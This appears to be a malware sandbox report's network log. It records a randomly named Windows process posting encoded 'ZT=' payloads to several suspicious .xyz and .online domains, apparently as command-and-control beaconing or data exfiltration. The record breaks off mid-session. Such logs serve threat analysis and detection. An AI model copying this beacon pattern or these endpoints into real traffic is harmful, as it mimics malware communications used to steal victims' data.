Timestamp: Oct 30, 2024 08:11:16.620498896 CET; Bytes transferred: 713; Direction: OUT; Data:
POST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=KHHZ406UZ5vtFuCPILEG+9elUKSAgxVO0tG4Fw3ucueNPGsSPCxe8FuZ3khyoooY8qU99KDJRSqFNkgmzLizLkaPBOF9i34xzq43D5KX4of3qzL3d+UE0hRkTKOxiGfGeZGnPtUTQ0RJsydNaZu8kt5AQDPmUNH+qn8ZVhpQHeJhVnOVYt8JAUKgxlW8dFIQDQ==
Timestamp: Oct 30, 2024 08:11:17.480217934 CET; Bytes transferred: 1236; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:17 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip


Session ID: 10
Source IP: 192.168.2.4; Source Port: 49969
Destination IP: 161.97.142.144; Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:11:19.179251909 CET; Bytes transferred: 733; Direction: OUT; Data:
POST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=KHHZ406UZ5vtEMWPLr4GutemYqSAyxVC0tK4FxzEc86NMncSdWlesVuZ8Eh334op8qRA9IXJRS+FNmomz46wZEaRUeF/oX4xzq43D5vw4oX3qi73PM92vBRreaOxomfKeZGVPoMpQ25Js2NNataztt5CejOME8zwkkBhagMyZ6MDUhDPJcdeSUuTsifIQG1ZYcrPpl0XqwYUiCEBxmnzsNQ=
Timestamp: Oct 30, 2024 08:11:20.001339912 CET; Bytes transferred: 1236; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:19 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip


Session ID: 11
Source IP: 192.168.2.4; Source Port: 49985
Destination IP: 161.97.142.144; Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:11:21.725886106 CET; Bytes transferred: 10815; Direction: OUT; Data:
POST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Timestamp: Oct 30, 2024 08:11:22.550036907 CET; Bytes transferred: 1236; Direction: IN; Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:22 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip


Session ID: 12
Source IP: 192.168.2.4; Source Port: 50000
Destination IP: 161.97.142.144; Destination Port: 80
PID: 3804
Process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe

Timestamp: Oct 30, 2024 08:11:24.304682970 CET; Bytes transferred: 446; Direction: OUT; Data:
GET /2sun/?ZT=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:11:25.122616053 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:25 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 2966
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: "66cce1df-b96"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:30.302237034 CET | 719 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=WXqJY1M5YeliHFTqrdZyZqNi70uSrSdUbo/m8fWnkynMVsxZqGyuVWbZuMT7Uv5sbgLi6KQgXWgRjnEikJEI8gknjLHQGVUWQ9BqqZYO/LCHt28BPFcXp1eskqXxQkWoechM/dtbY9Ec4BOgjalWE2ATCXGzmdif2esxFFGEOEOB/izDeDvT14eUQyAHW/aDBQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:32.933159113 CET | 739 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=WXqJY1M5YeliGlDqnaFyfKNh+0uSlydQbo7m8bu34QDMVMhZrCmuZ2bZgsT+aP5dbgPq6PogXW0Rjlsi4oF68wkyorHSJ1UWQ9BqqZMk/L6Hti4BdWEU1FejlqXxa0Wsechi/cw0Y4Yc4A+ggLlVN2BYfnHPvdWUvtVXOTSfOmGa+k+ZPyOEn46nN1Jzb8nKaVGztsWaLHA6WsdhDETpGbI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:35.528155088 CET | 10821 | OUT | POST /akxn/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.xipowerplay.xyz
                                                                                                                                                                              Referer: http://www.xipowerplay.xyz/akxn/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:38.066788912 CET | 448 | OUT | GET /akxn/?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.xipowerplay.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:11:38.719858885 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:38 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 254
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZT=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks=&mTkD=Gj2Ti2T0g4"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50024 | 198.251.84.200 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:43.883404016 CET | 728 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=sTBd9fWtqaQD00LEzLjg00FQtpPjyRLkyBaQzA50m19ZQpB2yWdQsH1bMqmH1l9y2a7Nu/upxqk3uInhAW5lKoTisB/qdqAEemSg5tGLA/GJJ0pEC2YwTwk29DmhOFmlHg7PkCzbiEb5ucavO5ZDp9DCm3Nn7q1KJZ/OXZDHQJX39cN4I7xGCICRilBkEelzfw==
Oct 30, 2024 08:11:44.784115076 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:44 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50025 | 198.251.84.200 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:46.430624962 CET | 748 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlAtZQLJ2jndQvH1bEKmC7F912bHzu/Cpxqg3uJXhAn4XJYTgnh+MZqAEemSg5tDWA+uJJEZECXY3Qwk18DmhKFmhHg6akAHxiHv5uYKvOtNCj9DEi3ML8ZIBOp21WrPGe6nHx6AiZKQRQImi/iIQJdY6Exe/C+T/0PFB1TQ2LdN+BHw=
Oct 30, 2024 08:11:47.336349010 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:47 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50026 | 198.251.84.200 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:48.974736929 CET | 10830 | OUT | POST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: ZT= [TRUNCATED]
Oct 30, 2024 08:11:49.870584965 CET | 908 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:49 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50027 | 198.251.84.200 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:51.522372961 CET | 451 | OUT | GET /wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:11:52.442900896 CET | 1048 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:52 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50028 | 172.67.154.67 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:11:57.656569958 CET | 704 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=MNWxkH/vtjzbbqyx30Zjr+qNZp0Axef59Vh/H5I8ynIIyPZL87yemFFSDlUYnlNwoRPiW+rusqhD+RhgU8vdXb/k5NlHAQvRDRGHcCGIgdQfu4EflTtRb0OGnHIhuvpn3Ov0cB+I29yWM7cibYDSaIBH7mhbNWpGgMlRDHC9CP/QDS2CdJH2iTIQH0zH/qHbLA==
Oct 30, 2024 08:11:58.332462072 CET | 1027 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5ZvPtRhUlbgd6ONKMjWbXaoAqljdmaPMTRB2s%2Fbi6WcDYYUN3nlC4cIdH4rcemOlzry82ceMTb6WE5krFVDHX6rp3XZhsByGm5EY7rJjdi59eMOQ8%2BSwMXmFDkScXu9uA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da998248a306b05-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50029 | 172.67.154.67 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:12:00.197139025 CET | 724 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVsIytBL6KyelFFSIFUXpFNBoRSfW+XusqlD+UdgUPXeXL/qidlZNwvRDRGHcDjVgdIfuI0fk35eVUOHunIhqvp73OvGcAjt2+KWM6MibK7RTIBFkWgMN3xNlOUnORuqNuq9P07YM4mhwTsjaz6zyp6SQGkAPsaCKkrVBhO2u59gbh8=
Oct 30, 2024 08:12:00.880208015 CET | 1025 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:00 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5aMnOrTDMLSCD9d3MNs5NP5MCIfiHRg%2FMrugTcVU3tK8Dxn28uRBzqqmnq4v9gRwb8qMCygHf%2BrOriebiqqnMTUbsJ9CD4YYQLhaxYhdUaSBSqIizJPZWpRg%2BmT7JTsgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da9983488fc4689-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 30, 2024 08:12:00.880224943 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50030 | 172.67.154.67 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:12:02.763341904 CET | 10806 | OUT | POST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
